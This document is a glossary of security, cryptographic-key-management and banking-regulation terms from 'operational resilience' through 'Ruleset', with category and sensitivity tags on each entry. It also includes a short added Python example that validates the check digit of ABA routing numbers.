operational resiliencenounThe ability of an FMI to: (i) maintain essential operational capabilities under adverse conditions or stress, even if in a degraded or debilitated state; and (ii) recover to effective operational capability in a time frame consistent with the provision of critical economic services.CapabilityRegulatedMay 9, 2026
Operational risknounThe risk of failure or loss resulting from inadequate or failed processes, people, or systems.ThreatRegulatedMay 12, 2026
Operational Vulnerability InformationnounInformation that describes the presence of an information vulnerability within a specific operational setting or network.VulnerabilityRegulatedCUIMay 12, 2026
Operational WaivernounAuthority for continued use of unmodified COMSEC end-items pending the completion of a mandatory modification.RequirementRegulatedCUIMay 9, 2026
Operations CodenounCode composed largely of words and phrases suitable for general communications use.ArtifactRegulatedCUIMay 9, 2026
Operations SecuritynounSystematic and proven process by which potential adversaries can be denied information about capabilities and intentions by identifying, controlling, and protecting generally unclassified evidence of the planning and execution of sensitive activities. The process involves five steps: identification of critical information, analysis of threats, analysis of vulnerabilities, assessment of risks, and application of appropriate countermeasures.ProcessRegulatedCUIMay 9, 2026
Operations TechnologynounThe hardware and software systems used to operate industrial control devices.SystemRegulatedMay 9, 2026
Optional ModificationnounNSA-approved modification not required for universal implementation by all holders of a COMSEC end-item. This class of modification requires all of the engineering/doctrinal control of mandatory modification but is usually not related to security, safety, TEMPEST, or reliability. See Mandatory Modification.ControlRegulatedCUIMay 9, 2026
Organizational Registration AuthoritynounEntity within the PKI that authenticates the identity and the organizational affiliation of the users.OrganizationRegulatedPIIMay 9, 2026
Originating depository financial institution (ODFI)nounA participating financial institution that originates entries at the request of and by agreement with its originators in accordance with the provisions of the NACHA rules.OrganizationRegulatedMay 9, 2026
origination functionnounAny of the processes required to initiate an automated clearing house transaction.ProcessRegulatedPCIMay 12, 2026
OriginatornounA person that has authorized an ODFI to transmit a credit or debit entry to the deposit account of a receiver at an RDFI.IdentityRegulatedPIIMay 9, 2026
Out-of-bandnounActivity outside of the primary means of interfacing with the customer. For example, if a user is performing activity online, he or she may be authenticated through a one-time password sent via text message.ControlRegulatedMay 12, 2026
outsourced applicationnounAn application that is contracted out to an external provider for the development, deployment, and management.SystemRegulatedMay 12, 2026
outsourcing arrangementnounA contract between the institution and an audit services firm to provide internal audit services.ProcessRegulatedMay 12, 2026
Over-The-Air Key TransfernounElectronically distributing key without changing traffic encryption key used on the secured communications path over which the transfer is accomplished.ProcessRegulatedCUIMay 12, 2026
Over-The-Air RekeyingnounChanging traffic encryption key or transmission security key in remote cryptographic equipment by sending new key directly to the remote cryptographic equipment over the communications path it secures.ProcessRegulatedCUIMay 12, 2026
overdraftnounThe amount by which withdrawals exceed deposits, or the extension of credit by a lending institution to allow for such a situation.DataRegulatedPIIMay 12, 2026
Partitioned Security ModenounInformation systems security mode of operation wherein all personnel have the clearance, but not necessarily formal access approval and need-to-know, for all information handled by an information system.RequirementRegulatedCUIMay 12, 2026
Passive WiretappingnounThe monitoring or recording of data while it is being transmitted over a communications link, without altering or affecting the data.ThreatRegulatedMay 12, 2026
patch and vulnerability management processnounOne of the many processes associated with the patching of software applications, including the situations in which an organization is forced to make emergency configuration changes that may reduce functionality in order to protect the organization from exploitation of the vulnerability.VulnerabilityRegulatedMay 12, 2026
Paying banknounA paying bank is the institution where a check is payable and to which it is sent for payment.OrganizationRegulatedMay 9, 2026
PaymentnounA transfer of value.DataRegulatedPCIMay 9, 2026
payment cardnounA range of different cards that can be used to access cash assets through point-of-sale terminals or other facilities in order to make payments, receive cash money, exchange currency and perform other actions determined by the card issuer and its terms.PhysicalRegulatedPCIMay 9, 2026
Payment systemnounThe mechanism, the rules, institutions, people, markets, and agreements that make the exchange of payments possible.SystemRegulatedPCIMay 9, 2026
Payments System Risk Policy (PSR)nounThe Federal Reserve's Payments System Risk (PSR) policy addressing the risks that payment systems present to the Federal Reserve Banks, the banking system, and to other sectors of the economy.RequirementRegulatedMay 12, 2026
Payroll card accountnounA bank account that is established directly or indirectly by an employer on behalf of an employee, to which the employee's wages or compensation are transferred electronically on a recurring basis. The payroll card, often branded by one of the credit/debit card associations, provides the employee access to the funds.DataRegulatedPIIMay 9, 2026
PCI Security Standards CouncilnounThe governing body, representing key participants of the payment card industry, which establishes and maintains security standards for payment cards.OrganizationRegulatedPCIMay 12, 2026
PenetrationnounGaining unauthorized logical access to sensitive data by circumventing a system's protections.ThreatRegulatedMay 12, 2026
Penetration testingnounSecurity testing in which evaluators mimic real-world attacks in an attempt to identify ways to circumvent the security features of an application, system, or network. Penetration testing often involves issuing real attacks on real systems and data, using the same tools and techniques used by actual attackers. Most penetration tests involve looking for combinations of vulnerabilities on a single system or multiple systems that can be used to gain more access than could be achieved through a single vulnerability.ProcessRegulatedMay 9, 2026
Per-Call KeynounUnique traffic encryption key generated automatically by certain secure telecommunications systems to secure single voice or data transmissions. See Cooperative Key Generation.CredentialRegulatedCUIMay 9, 2026
Perimeternoun(C&A) Encompasses all those components of the system that are to be accredited by the DAA, and excludes separately accredited systems to which the system is connected. (Authorization) Encompasses all those components of the system or network for which a Body of Evidence is provided in support of a formal approval to operate.SystemRegulatedCUIMay 12, 2026
Periods ProcessingnounThe processing of various levels of classified and unclassified information at distinctly different times. Under the concept of periods processing, the system must be purged of all information from one processing period before transitioning to the next.ProcessRegulatedCUIMay 9, 2026
Person-to-person (P2P) paymentnounOnline payments using electronic mail messages to invoke a transfer of value between the parties over existing proprietary networks as on-us transactions.ProcessRegulatedPCIMay 9, 2026
Personal DatanounDataRegulatedPIIMay 13, 2026
Personal digital assistant (PDA)nounA pocket-sized, special-purpose personal computer that lacks a conventional keyboard.PhysicalRegulatedMay 12, 2026
Personal identification numbernounA secret that a claimant memorizes and uses to authenticate his or her identity. PINs are generally only decimal digits.CredentialRegulatedPIIMay 12, 2026
personal identification number informationnounInformation containing an account-holder's secret code that is used to verify their identity when trying to access a computer system, network, credit card account, ATM, etc.DataRegulatedPIIMay 9, 2026
Personal Identifying Information / Personally Identifiable InformationnounThe information that permits the identity of an individual to be directly or indirectly inferred.DataRegulatedPIIMay 9, 2026
Personal Identity VerificationnounThe process of creating and using a governmentwide secure and reliable form of identification for federal employees and contractors, in support of HSPD 12, Policy for a Common Identification Standard for Federal Employees and Contractors.ProcessRegulatedCUIMay 9, 2026
Personal Identity Verification AccreditationnounThe official management decision to authorize operation of a PIV Card Issuer after determining that the Issuer’s reliability has satisfactorily been established through appropriate assessment and certification processes.ProcessRegulatedCUIMay 9, 2026
Personal Identity Verification Authorizing OfficialnounAn individual who can act on behalf of an agency to authorize the issuance of a credential to an applicant.RoleRegulatedCUIMay 9, 2026
Personal Identity Verification CardnounPhysical artifact (e.g., identity card, “smart” card) issued to an individual that contains stored identity credentials (e.g., photograph, cryptographic keys, digitized fingerprint representation, etc.) such that a claimed identity of the cardholder may be verified against the stored credentials by another person (human-readable and verifiable) or an automated process (computer-readable and verifiable).PhysicalRegulatedCUIMay 9, 2026
Personal Identity Verification IssuernounAn authorized identity card creator that procures FIPS-approved blank identity cards, initializes them with appropriate software and data elements for the requested identity verification and access control application, personalizes the cards with the identity credentials of the authorized subjects, and delivers the personalized card to the authorized subjects along with appropriate instructions for protection and use.OrganizationRegulatedCUIMay 9, 2026
Personal Identity Verification RegistrarnounAn entity that establishes and vouches for the identity of an applicant to a PIV Issuer. The PIV RA authenticates the applicant’s identity by checking identity source documents and performing identity proofing, and ensures that a proper background check has been completed before the credential is issued.OrganizationRegulatedPIIMay 9, 2026
Personal Identity Verification SponsornounAn individual who can act on behalf of a department or agency to request a PIV Card for an applicant.RoleRegulatedCUIMay 9, 2026
Personally identifiable financial informationnounFor purposes of the Information Security Standards, personally identifiable financial information means information (i) a consumer provides to a financial institution to obtain a financial product or service; (ii) about a consumer resulting from any transaction involving a financial product or service between the financial institution and a consumer; or (iii) that a financial institution otherwise obtains about a consumer in connection with providing a financial product or service, such as account balance information, payment history, overdraft history, and credit or debit card purchase information; or the fact that an individual is one of the financial institution’s customers.DataRegulatedPIIMay 9, 2026
Personally Identifiable InformationnounAny information about an individual maintained by an agency, including (1) any information that can be used to distinguish or trace an individual's identity, such as name, social security number, date and place of birth, mother's maiden name, or biometric records; and (2) any other information that is linked or linkable to an individual, such as medical, educational, financial, and employment information.DataRegulatedPIIMay 9, 2026
personnel risk assessmentnounThe purpose of this task is to determine the risk that personnel pose to the organization.ProcessRegulatedPIIMay 9, 2026
personnel risk assessment programnounA documented listing of procedures and instructions to be performed to complete a personnel risk assessment.ProcessRegulatedMay 12, 2026
physical accessnounThe ability of people to physically gain access to a computer system or facility.ControlRegulatedMay 9, 2026
physical access control systemnounPhysical access control enables an authority to control admission to areas and resources in a physical facility. A physical access control system may restrict access via swipe cards, Personal Identity Verification (PIV) 'Smart' cards, and biometric (e.g., fingerprint) readers. Physical access control systems are generally seen as the second layer in the security of a physical facility, after fences, doors and barriers.ControlRegulatedMay 9, 2026
Physical Access Control system maintenance and testing programnounA documented listing of procedures, schedules, roles and responsibilities, and plans to be performed to ensure continued maintenance and testing of the Physical Access Control System.ControlRegulatedCUIMay 9, 2026
physical access lognounA record of who has accessed something.ArtifactRegulatedMay 12, 2026
physical securitynounThe protection of personnel, hardware, programs, networks, and data from physical circumstances and events that could cause serious losses or damage to an enterprise, agency, or institution. This includes protection from fire, natural disasters, burglary, theft, vandalism, and terrorism.ControlRegulatedMay 12, 2026
physical security perimeternounA type of gate, door, wall, or fence system that is intended to restrict and control the physical access or egress of personnel.PhysicalRegulatedMay 9, 2026
physical security plannounA formal document that provides an overview of the security requirements for a physical security program and describes the security controls in place or planned for meeting those requirements.ArtifactRegulatedCUIMay 12, 2026
PII Confidentiality Impact LevelnounThe PII confidentiality impact level—low, moderate, or high—indicates the potential harm that could result to the subject individuals and/or the organization if PII were inappropriately accessed, used, or disclosed.MetricRegulatedPIIMay 9, 2026
plaintextnounIntelligible data that has meaning and can be understood without the application of decryption.DataRegulatedMay 9, 2026
Plan of Action and MilestonesnounA document that identifies tasks needing to be accomplished. It details resources required to accomplish the elements of the plan, any milestones in meeting the tasks, and scheduled completion dates for the milestones.ArtifactRegulatedCUIMay 9, 2026
Point-of-sale (POS) networknounA network of institutions, debit cardholders, and merchants that permits consumers to make direct payment electronically at the place of purchase. The funds are withdrawn from the account of the cardholder.NetworkRegulatedPCIMay 9, 2026
Policy Approving AuthoritynounFirst level of the PKI Certification Management Authority that approves the security policy of each PCA.RoleRegulatedMay 9, 2026
Policy Certification AuthoritynounSecond level of the PKI Certification Management Authority that formulates the security policy under which it and its subordinate CAs will issue public key certificates.OrganizationRegulatedMay 9, 2026
Policy Management AuthoritynounBody established to oversee the creation and update of Certificate Policies, review Certification Practice Statements, review the results of CA audits for policy compliance, evaluate non-domain policies for acceptance within the domain, and generally oversee and manage the PKI certificate policies. For the FBCA, the PMA is the Federal PKI Policy Authority.OrganizationRegulatedMay 12, 2026
Policy MappingnounRecognizing that, when a CA in one domain certifies a CA in another domain, a particular certificate policy in the second domain may be considered by the authority of the first domain to be equivalent (but not necessarily identical in all respects) to a particular certificate policy in the first domain.ProcessRegulatedMay 12, 2026
portnounA physical entry or exit point of a cryptographic module that provides access to the module for physical signals, represented by logical information flows (physically separated ports do not share the same physical pin or wire).NetworkRegulatedMay 12, 2026
Portable Electronic DevicenounAny nonstationary electronic apparatus with singular or multiple capabilities of recording, storing, and/or transmitting data, voice, video, or photo images. This includes but is not limited to laptops, personal digital assistants, pocket personal computers, palmtops, MP3 players, cellular telephones, thumb drives, video cameras, and pagers.PhysicalRegulatedCUIMay 9, 2026
Positive Control MaterialnounGeneric term referring to a sealed authenticator system, permissive action link, coded switch system, positive enable system, or nuclear command and control documents, material, or devices.PhysicalRegulatedCUIMay 9, 2026
Positive paynounA technique that can reduce check fraud by requesting businesses to send electronic files of information to the financial institution on all checks the business has issued.ControlRegulatedMay 12, 2026
Post-ProcessingnounProcessRegulatedMay 13, 2026
Post-Processing AlgorithmnounProcessRegulatedMay 13, 2026
Pre-Processing AlgorithmnounProcessRegulatedMay 13, 2026
Prediction ResistancenounPrediction resistance is provided relative to time T if there is assurance that an adversary who has knowledge of the internal state of the DRBG at some time prior to T would be unable to distinguish between observations of ideal random bitstrings and bitstrings output by the DRBG at or subsequent to time T. The complementary assurance is called Backtracking Resistance.ControlRegulatedMay 12, 2026
PreprocessingnounProcessRegulatedMay 13, 2026
Presentment feenounA fee that an institution receiving a check may impose on the institution that presents the check for payment. No presentment fee may be charged for checks presented by 8 a.m. local time.RequirementRegulatedMay 9, 2026
previous residencenounA location where someone was living before where that person is currently living.DataRegulatedPIIMay 9, 2026
Primary Services NodenounA Key Management Infrastructure core node that provides the users’ central point of access to KMI products, services, and information.SystemRegulatedCUIMay 12, 2026
Principal Certification AuthoritynounThe Principal Certification Authority is a CA designated by an agency to interoperate with the FBCA. An agency may designate multiple Principal CAs to interoperate with the FBCA.IdentityRegulatedCUIMay 9, 2026
Print SuppressionnounEliminating the display of characters in order to preserve their secrecy.ControlRegulatedMay 12, 2026
prior tonounLimits a Control's or Mandate's secondary verb so that the required action must take place before the stated event occurs.RequirementRegulatedMay 12, 2026
PrivacynounRestricting access to subscriber or Relying Party information in accordance with federal law and agency policy.RequirementRegulatedMay 13, 2026
Privacy SystemnounCommercial encryption system that affords telecommunications limited protection to deter a casual listener, but cannot withstand a technically competent cryptanalytic attack.SystemRegulatedMay 12, 2026
Privacy-By-DesignnounControlRegulatedMay 13, 2026
Private label cardnounSee "Store Card".DataRegulatedPCIMay 9, 2026
Privileged CommandnounA human-initiated command executed on an information system involving the control, monitoring, or administration of the system including security functions and associated security-relevant information.ProcessRegulatedCUIMay 12, 2026
ProcessingnounProcessRegulatedPIIMay 13, 2026
Processing EnvironmentnounProcessRegulatedMay 13, 2026
processing requirementnounA condition that must be fulfilled in order for something to be processed.RequirementRegulatedMay 9, 2026
ProcessornounRegulatedMay 13, 2026
Product Source NodenounThe Key Management Infrastructure core node that provides central generation of cryptographic key material.SystemRegulatedCUIMay 12, 2026
productionnounThe purpose of this task is to transform tangible inputs and intangible inputs into goods or services, to create output or deliverables (goods or services) for another party, and to retrieve documents and make them available for use in a legal proceeding, especially as part of discovery.ProcessRegulatedMay 12, 2026
production codenounCode that is currently used in a production environment.DataRegulatedIPMay 9, 2026
Production ModelnounINFOSEC equipment in its final mechanical and electrical form.PhysicalRegulatedMay 12, 2026
ProfilingnounMeasuring the characteristics of expected activity so that changes to it can be more easily identified.ProcessRegulatedPIIMay 13, 2026
Proof of deposit (POD)nounThe verification of the dollar amount written on a negotiable instrument being deposited.ArtifactRegulatedMay 12, 2026
Protected ClassnounRegulatedMay 13, 2026
Protected Distribution SystemnounWire line or fiber optic system that includes adequate safeguards and/or countermeasures (e.g., acoustic, electric, electromagnetic, and physical) to permit its use for the transmission of unencrypted information through an area of lesser classification or control.NetworkRegulatedCUIMay 9, 2026
Protective Distribution SystemnounWire line or fiber optic system that includes adequate safeguards and/or countermeasures (e.g., acoustic, electric, electromagnetic, and physical) to permit its use for the transmission of unencrypted information.SystemRegulatedCUIMay 9, 2026
Protective PackagingnounPackaging techniques for COMSEC material that discourage penetration, reveal a penetration has occurred or was attempted, or inhibit viewing or copying of keying material prior to the time it is exposed for use.ControlRegulatedCUIMay 9, 2026
Protective TechnologiesnounSpecial tamper-evident features and materials employed for the purpose of detecting tampering and deterring attempts to compromise, modify, penetrate, extract, or substitute information processing equipment and keying material.ControlRegulatedCUIMay 9, 2026
protective technologynounSpecial tamper-evident features and materials employed for the purpose of detecting tampering and deterring attempts to compromise, modify, penetrate, extract, or substitute information processing equipment and keying material.ControlRegulatedMay 9, 2026
provide fornounMake adequate preparation for something.RequirementRegulatedMay 9, 2026
provisionnounSomething provided or supplied.RequirementRegulatedMay 12, 2026
Pseudo-Anonymization (pseudonymization)nounRegulatedPIIMay 13, 2026
PurgenounRendering sanitized data unrecoverable by laboratory attack methods.ProcessRegulatedMay 12, 2026
QuadrantnounShort name referring to technology that provides tamper-resistant protection to cryptographic equipment.PhysicalRegulatedCUIMay 9, 2026
Radiation MonitoringnounRadiation monitoring is the process of receiving images, data, or audio from an unprotected source by listening to radiation signals.ProcessRegulatedMay 9, 2026
RandomizernounAnalog or digital source of unpredictable, unbiased, and usually independent bits. Randomizers can be used for several different functions, including key generation or to provide a starting state for a key generator.CapabilityRegulatedMay 12, 2026
read-only medianounMedia that can only be written to once.PhysicalRegulatedMay 9, 2026
Real time gross settlement (RTGS) SystemnounA type of payments system operating in real time rather than batch processing mode. It provides immediate finality of transactions. Gross settlement refers to the settlement of each transfer individually rather than netting. Fedwire® is an example of a real time gross settlement system.SystemRegulatedMay 12, 2026
ReceivernounAn individual, corporation, or other entity that has authorized a company or an originator to initiate a credit or debit entry to a transaction account belonging to the receiver held at its RDFI.IdentityRegulatedPIIMay 9, 2026
Receiving depository financial institution (RDFI)nounAny financial institution qualified to receive debits or credits through its ACH operator in accordance with the ACH rules.OrganizationRegulatedMay 9, 2026
Recipient Usage PeriodnounThe period of time during the cryptoperiod of a symmetric key when protected information is processed.MetricRegulatedMay 12, 2026
recommendationnounA proposal for the best course of action.FindingRegulatedMay 12, 2026
Reconverting bank (Check 21)nounThe financial institution that creates a substitute check. With respect to a substitute check that was created by a person that is not a financial institution, the reconverting bank is the first financial institution that transfers, presents, or returns that substitute check or, in lieu thereof, the first paper or electronic representation of that substitute check. The reconverting bank warrants that (1) the substitute check is the legal equivalent of the original check; and (2) the original check cannot be presented again in any form so the customer pays the check only once.OrganizationRegulatedMay 9, 2026
recordnounAnything that is put down in permanent form and preserved as evidence.ArtifactRegulatedPIIMay 9, 2026
Records ManagementnounThe process for tagging information for records-keeping requirements as mandated in the Federal Records Act and the National Archival and Records Requirements.ProcessRegulatedCUIMay 9, 2026
recoursenounThe legal right to demand compensation or payment.RequirementRegulatedMay 9, 2026
Recover FunctionnounDevelop and implement the appropriate activities to maintain plans for resilience and to restore any capabilities or services that were impaired due to a cybersecurity event.ProcessRegulatedMay 9, 2026
recovery plannounThe written expression of a recovery process, which consists of defining rules, processes, and disciplines to ensure that the critical business processes will continue to function if there is a failure of one or more of the information processing or telecommunications resources upon which their operations depend. The following are key elements of a disaster recovery plan: 1) Establish a planning group, 2) Perform risk assessment and audits, 3) Establish priorities for applications and networks, 4) Develop recovery strategies, 5) Prepare inventory and documentation of the plan, 6) Develop verification criteria and procedures, 7) Implement the plan.ProcessRegulatedMay 12, 2026
Recovery ProceduresnounActions necessary to restore data files of an information system and computational capability after a system failure.ProcessRegulatedCUIMay 12, 2026
Recovery service levelsnounCollectively, terms that define the speed, quality, and quantity of recovery capability in response to a disaster, including recovery time objective, recovery point objective, timely notification, percentage of normal production service level agreements (SLAs) that will be delivered during recovery mode, etc.RequirementRegulatedMay 9, 2026
RectificationnounRegulatedPIIMay 13, 2026
REDnounIn cryptographic systems, refers to information or messages that contain sensitive or classified information that is not encrypted. See also BLACK.DataRegulatedCUIMay 9, 2026
Red SignalnounAny electronic emission (e.g., plain text, key, key stream, subkey stream, initial fill, or control signal) that would divulge national security information if recovered.VulnerabilityRegulatedCUIMay 9, 2026
Red/Black ConceptnounSeparation of electrical and electronic circuits, components, equipment, and systems that handle unencrypted information (Red), in electrical form, from those that handle encrypted information (Black) in the same form.ControlRegulatedCUIMay 9, 2026
RegistrationnounThe process through which a party applies to become a subscriber of a Credentials Service Provider (CSP) and a Registration Authority validates the identity of that party on behalf of the CSP.ProcessRegulatedPIIMay 12, 2026
Registration authoritynounA trusted entity that establishes and vouches for the identity of a Subscriber to a CSP. The RA may be an integral part of a CSP, or it may be independent of a CSP, but it has a relationship to the CSP(s).OrganizationRegulatedPIIMay 9, 2026
Regulation CCnounA regulation (12 CFR 229) promulgated by the Board of Governors of the Federal Reserve System regarding the availability of funds and the collection of checks. The regulation governs the availability of funds deposited in checking accounts and the collection and return of checks.RequirementRegulatedMay 12, 2026
Regulation EnounA regulation (12 CFR 205) promulgated by the Board of Governors of the Federal Reserve System to ensure consumers a minimum level of protection in disputes arising from electronic fund transfers.RequirementRegulatedMay 9, 2026
Regulation ZnounRegulation Z, the Truth in Lending Act (TILA) (12 CFR 226) promulgated by the Board of Governors of the Federal Reserve System. The regulation prescribes uniform methods for computing the cost of credit, disclosing credit terms, and resolving errors on certain types of credit accounts.RequirementRegulatedMay 9, 2026
regulatory guidancenounAssistance with the compliance to regulations.RequirementRegulatedMay 9, 2026
regulatory noticenounAny documented (in print or electronic format) notice used to inform affected parties regarding regulatory issues.ArtifactRegulatedMay 12, 2026
Regulatory requirementsnounRules or laws that regulate conduct and that the enterprise must obey to become compliant.RequirementRegulatedMay 9, 2026
Release PrefixnounPrefix appended to the short title of U.S.-produced keying material to indicate its foreign releasability. "A" designates material that is releasable to specific allied nations, and "U.S." designates material intended exclusively for U. S. use.ArtifactRegulatedCUIMay 9, 2026
RemanencenounResidual information remaining on storage media after clearing. See Magnetic Remanence and Clearing.VulnerabilityRegulatedCUIMay 9, 2026
remedial actionnounAction taken to implement long-term restoration of environmental quality.ControlRegulatedMay 12, 2026
Remittance cardsnounPayment cards that are typically used to facilitate cross-border movement of funds by individuals and for person-to-person transactions.DataRegulatedPCIMay 9, 2026
remote accessnounAccess to an organization's nonpublic information system by an authorized user (or an information system) communicating through an external, non-organization-controlled network (e.g., the Internet).CapabilityRegulatedMay 12, 2026
Remote access servicenounRefers to any combination of hardware and software that enables remote access to tools or information that typically reside on a network of IT devices. Scope Note: Originally coined by Microsoft when referring to their built-in NT remote access tools, RAS was a service provided by Windows NT which allowed most of the services that would be available on a network to be accessed over a modem link. Over the years, many vendors have provided both hardware and software solutions to gain remote access to various types of networked information. In fact, most modern routers include a basic RAS capability that can be enabled for any dial-up interface.SystemRegulatedMay 9, 2026
Remote deletionsnounUse of a technology to remove data from a portable device without touching the device.CapabilityRegulatedMay 12, 2026
Remote deposit capture (RDC)nounA service that enables users at remote locations to scan digital images of checks and transmit the captured data to a financial institution or a merchant that is a customer of a financial institution.CapabilityRegulatedPCIMay 9, 2026
Remote Diagnostics/MaintenancenounMaintenance activities conducted by authorized individuals communicating through an external network (e.g., the Internet).ProcessRegulatedMay 12, 2026
Remote journalingnounProcess used to transmit journal or transaction logs in real time to a back-up location.ProcessRegulatedMay 9, 2026
remote maintenancenounMaintenance activities conducted by individuals communicating external to an information system security perimeter.ProcessRegulatedMay 9, 2026
Remote RekeyingnounProcedure by which a distant crypto-equipment is rekeyed electrically. See Automatic Remote Rekeying and Manual Remote Rekeying.ProcessRegulatedCUIMay 9, 2026
Remotely created check (RCC)nounA check that is drawn on a customer account at a financial institution, is created by the payee, and does not bear a signature in the format agreed to by the paying financial institution and customer. RCCs are also known as "demand drafts," "telechecks," "preauthorized drafts," "paper drafts," or "digital checks."DataRegulatedPCIMay 9, 2026
Removable medianounPortable electronic storage media such as magnetic, optical, and solid-state devices, which can be inserted into and removed from a computing device, and that is used to store text, video, audio, and image information. Such devices have no independent processing capabilities. Examples include hard disks, floppy disks, zip drives, compact disks (CDs), thumb drives, pen drives, and similar USB storage devices.PhysicalRegulatedMay 9, 2026
removable storage medianounPortable electronic storage media such as magnetic, optical, and solid-state devices, which can be inserted into and removed from a computing device, and that is used to store text, video, audio, and image information. Such devices have no independent processing capabilities. Examples include hard disks, floppy disks, zip drives, compact disks (CDs), thumb drives, pen drives, and similar USB storage devices.PhysicalRegulatedMay 12, 2026
removalnounDismissal from office.ControlRegulatedMay 9, 2026
Repair ActionnounNSA-approved change to a COMSEC end-item that does not affect the original characteristics of the end-item and is provided for optional application by holders. Repair actions are limited to minor electrical and/or mechanical improvements to enhance operation, maintenance, or reliability. They do not require an identification label, marking, or control but must be fully documented by changes to the maintenance manual.ControlRegulatedCUIMay 9, 2026
reportnounA spoken or written account of something that has been seen, done, etc.ArtifactRegulatedMay 9, 2026
Report of ExaminationnounThe report prepared by the Board, or other federal or state financial institution supervisory agency, concerning the examination of a financial institution, and includes reports of inspection and reports of examination of U.S. branches or agencies of foreign banks and representative offices of foreign organizations, and other institutions examined by the Federal Reserve System.ArtifactRegulatedMay 9, 2026
reportable cyber incidentnounA Cyber Security Incident that has compromised or disrupted one or more reliability tasks of a functional entity.EventRegulatedCUIMay 9, 2026
reportingnounThe action of providing an account of something.ProcessRegulatedMay 9, 2026
reporting requirementnounSet by the organization, this requires third parties to provide certain update and other status reports, such as work status, Service Level Agreement status, etc.RequirementRegulatedMay 9, 2026
RepositorynounA database containing information and data relating to certificates as specified in a CP; may also be referred to as a directory.DataRegulatedMay 12, 2026
RepudiationnounThe denial by one of the parties to a transaction of participation in all or part of that transaction or of the content of the communication.RequirementRegulatedMay 12, 2026
Reserve accountnounA non-interest-earning balance account institutions maintain with the Federal Reserve Bank or with a correspondent bank to satisfy the Federal Reserve's reserve requirements. Reserve account balances play a central role in the exchange of funds between depository institutions.DataRegulatedMay 12, 2026
Reserve Keying MaterialnounKey held to satisfy unplanned needs. See Contingency Key.CredentialRegulatedCUIMay 9, 2026
Reserve requirementsnounThe percentage of deposits that a depository institution may not lend out or invest and must hold either as vault cash or on deposit at a Federal Reserve Bank. Reserve requirements affect the potential of the banking system to create transaction deposits.RequirementRegulatedMay 9, 2026
ResiduenounData left in storage after information-processing operations are complete, but before degaussing or overwriting has taken place.DataRegulatedCUIMay 12, 2026
resilience by designnounThe embedding of security in technology and system development from the earliest stages of conceptualisation and design.RequirementRegulatedMay 9, 2026
responsenounAn action taken that addresses an incident and assesses the level of containment and control activity required.ProcessRegulatedMay 12, 2026
responsible entitynounAny group or individual within an organization that has been given responsibility for a particular process.RoleRegulatedMay 12, 2026
Retail paymentsnounPayments, typically small, made in the goods and services market.DataRegulatedPCIMay 9, 2026
Retention requirementnounRequirement established by a company or by regulation for the length of time and/or for the amount of information that should be retained.RequirementRegulatedMay 9, 2026
Return (ACH)nounAny ACH entry that has been returned to the ODFI by the RDFI or by the ACH operator because it cannot be processed. The reason for each return is included with the return in the form of a "return reason code." (See the NACHA "Operating Rules and Guidelines" for a complete reason code listing.)ArtifactRegulatedPCIMay 9, 2026
review and approvenounExamine, make changes if necessary, and officially accept.ProcessRegulatedMay 12, 2026
risk assessmentnounThe process of identifying, prioritizing, and estimating risks. This includes determining the extent to which adverse circumstances or events could impact an enterprise. Uses the results of threat and vulnerability assessments to identify risk to organizational operations and evaluates those risks in terms of likelihood of occurrence and impacts if they occur. The product of a risk assessment is a list of estimated potential impacts and unmitigated vulnerabilities. Risk assessment is part of risk management and is conducted throughout the Risk Management Framework (RMF).ProcessRegulatedMay 12, 2026
risk management controlnounControls associated with instruments that introduce risks that require effective adherence to the relevant clearing house, association, interchange, and regulatory requirements.ControlRegulatedMay 9, 2026
risk management programnounA documented listing of procedures, schedules, roles and responsibilities, and plans to be performed to identify, control, and reduce or eliminate risks to operations, assets, or individuals that are inherent to system development and operations.ProcessRegulatedMay 9, 2026
Risk Mitigation PlannounThis record contains detailed proposals intended to reduce the risks to a critical asset, typically including actions or countermeasures designed to counter the threats to assets.ControlRegulatedCUIMay 9, 2026
Risk ProfilenounThis record contains an outline of the number, type, and potential effects of risks to which an asset or organization are exposed.ArtifactRegulatedMay 12, 2026
risk-based approachnounAn approach whereby FMIs identify, assess and understand the risks to which they are exposed to and take measures commensurate with these risks.ProcessRegulatedMay 12, 2026
risk-based authenticationnounAny risk-based system of authentication that detects anomalies or changes in the normal use patterns of a Person and requires additional verification of the Person’s identity when such deviations or changes are detected, such as through the use of challenge questions.ControlRegulatedPIIMay 12, 2026
RloginnounRemote login. A UNIX utility (RFC 1282) that allows a user to log in to a remote host on a network, as if it were directly connected, and make use of various services. Remote login is an information exchange between network-connected devices where the information cannot be reliably protected end-to-end by a single organization's security controls. Note: rlogin sends passwords and session data in cleartext and trusts host-based .rhosts entries; it should be replaced by SSH wherever it is still found.CapabilityRegulatedMay 12, 2026
Routing numbernounAlso referred to as the ABA number. A nine-digit number (eight digits and a check digit) that identifies a specific financial institution.DataRegulatedMay 12, 2026
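The "eight digits and a check digit" structure above is a weighted mod-10 check: the nine digits are weighted 3,7,1,3,7,1,3,7,1 and the weighted sum must be divisible by 10. The following is an added example, not code from the glossary or from any bank or clearing house; the sample numbers it validates are constructed inputs chosen to satisfy or violate the formula, not assertions about any institution.

```python
# Added example, not part of the glossary: ABA routing transit number
# check-digit verification. The nine digits are weighted 3,7,1,3,7,1,3,7,1
# and the weighted sum must be a multiple of 10.
WEIGHTS = (3, 7, 1, 3, 7, 1, 3, 7, 1)


def routing_number_is_valid(rtn: str) -> bool:
    """True if rtn is nine ASCII digits whose weighted sum is 0 mod 10."""
    if len(rtn) != 9 or not rtn.isdigit():
        return False
    total = sum(int(d) * w for d, w in zip(rtn, WEIGHTS))
    return total % 10 == 0


def routing_check_digit(first_eight: str) -> str:
    """Compute the ninth (check) digit for an eight-digit prefix."""
    if len(first_eight) != 8 or not first_eight.isdigit():
        raise ValueError("expected exactly eight digits")
    partial = sum(int(d) * w for d, w in zip(first_eight, WEIGHTS[:8]))
    return str((10 - partial % 10) % 10)


if __name__ == "__main__":
    # Constructed sample inputs: one valid, one with a wrong check digit,
    # one with the first two digits transposed, one with a non-digit.
    for sample in ("011000015", "011000016", "101000015", "01100001A"):
        print(sample, routing_number_is_valid(sample))
    print("01100001 ->", routing_check_digit("01100001"))
```

The check catches every single-digit error and most adjacent transpositions (a swap of digits that differ by exactly 5 under the 3/7 weights slips through). It is a format check only: a number that passes is well-formed, not proof that the institution exists or that the account is live, so it belongs at input validation and not in place of a directory lookup.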
rulenounA principle, condition, or regulation that customarily governs behavior or procedure within a particular area of activity.RequirementRegulatedMay 12, 2026
RulesetnounA set of directives that govern the access control functionality of a firewall. The firewall uses these directives to determine how packets should be routed between its interfaces.ControlRegulatedMay 12, 2026
